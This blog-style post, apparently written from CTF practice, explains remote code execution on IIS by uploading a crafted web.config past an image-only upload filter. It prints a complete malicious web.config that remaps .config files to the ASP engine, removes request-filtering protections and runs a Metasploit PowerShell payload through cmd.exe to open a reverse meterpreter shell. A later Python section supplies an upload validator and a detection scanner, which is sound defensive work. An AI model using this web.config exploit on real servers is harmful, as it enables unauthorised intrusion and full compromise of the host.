RCE on IIS webserver via web.config

Hi,

Recently I have started doing CTFs, and there I have learned a lot of new stuff. This is one of them, which is quite easy but tricky. 😉

SCENARIO :- 

You have an uploader on an IIS server which accepts only files with the extension ‘.png’ or ‘.jpg’.

If you try uploading files

  • with extension ‘.png’ or ‘.jpg’, they will be uploaded.

  • with extension ‘.aspx’ or ‘.asp’, it will show an error, as those extensions are not allowed to be uploaded.

  • but if you try to upload a ‘web.config’, it will get uploaded 😉

So you may ask what this ‘web.config’ is all about?

It is an XML-based configuration file used to set rules and behavior for a specific directory. It is comparable to the ‘.htaccess’ file of Linux-based web servers, which serves the same purpose.

Ex (rules and behavior) :-

  1. Enable / disable firewall rules.
  2. Read / write permissions.
  3. Controlling database connection strings.
  4. Setting up error behavior and security measures.

Exploiting this vulnerability :-

So we will try to get a reverse shell by uploading a crafted ‘web.config’.

[STEP – 1] SETTING UP LISTENER

We will use the Metasploit ‘web_delivery’ module for it.

LINK:- https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery

COMMANDS :

As we know that our target system is running IIS (i.e. Windows), we generate the PowerShell payload.

[STEP – 2] UPLOADING WEB.CONFIG TO GET REVERSE SHELL

In step 1 we got a PowerShell payload; now we have to place it into our web.config file. Below you can see the XML code: save it as web.config and replace the PAYLOAD placeholder with the PowerShell payload.

CODE (web.config) :-

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <!-- Map requests for *.config to the classic ASP engine, so this very file is executed as ASP. -->
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- Lift the default request filtering rules that block .config files and hide web.config. -->
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- The ASP block below sits inside an XML comment so the file stays valid XML;
     the first and last Response.write calls close and reopen the comment in the rendered output. -->
<!--
<%
Response.write("-"&"->")
Response.write("Spider Sec")
Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD ")
Response.write("<!-"&"-")
%>
-->

EX:-

Now request the uploaded web.config from the server so it gets executed.

Now you will get a meterpreter session 🙂
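From the defender's side, the two weaknesses this post relies on are an extension-only upload check and a web.config that re-maps .config files to a script engine. Below is an added Python example (not part of the original post) with an upload validator that also checks reserved IIS names and image magic bytes, plus a scanner that flags the handler and request filtering directives used above; the function names and the embedded sample config are constructed for illustration.

```python
import os
import xml.etree.ElementTree as ET

ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff"}  # ext -> magic bytes
# Names IIS treats specially; an extension allowlist alone does not stop them.
RESERVED = {"web.config", "global.asax", "machine.config"}

def is_safe_upload(filename: str, content: bytes) -> bool:
    """Accept only a plain image whose name, extension and magic bytes all agree."""
    base = os.path.basename(filename.replace("\\", "/")).strip().lower()
    stem, ext = os.path.splitext(base)
    if base in RESERVED or "." in stem:      # reserved name or double extension
        return False
    if ext not in ALLOWED:
        return False
    return content.startswith(ALLOWED[ext])  # extension says image, bytes must agree

def suspicious_webconfig_directives(data: bytes) -> list:
    """Flag web.config directives that make IIS execute .config files as script."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    for add in root.iter("add"):  # handler mappings that hand .config to a script engine
        path = add.get("path", "")
        if add.get("scriptProcessor") and path.lower().endswith(".config"):
            findings.append(f"handler maps {path} to {add.get('scriptProcessor')}")
    for rem in root.iter("remove"):  # request filtering protections being removed
        if rem.get("fileExtension", "").lower() == ".config":
            findings.append("request filtering for .config removed")
        if rem.get("segment", "").lower() == "web.config":
            findings.append("web.config hidden segment removed")
    return findings

# Constructed sample mirroring the structure of the crafted web.config (not a real upload).
SAMPLE_WEBCONFIG = b"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
  <handlers accessPolicy="Read, Script, Write">
    <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
         scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" />
  </handlers>
  <security><requestFiltering>
    <fileExtensions><remove fileExtension=".config" /></fileExtensions>
    <hiddenSegments><remove segment="web.config" /></hiddenSegments>
  </requestFiltering></security>
</system.webServer></configuration>
<!-- <% 'an ASP block would sit here %> -->
"""
```

Running the scanner over files found in upload directories (or over any web.config created outside a deployment) gives a simple detection for this technique, while the validator shows why the name and content must be checked, not just the extension.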

Hope you will like it.

cheers 🙂

Follow us on twitter : @SpiderSec
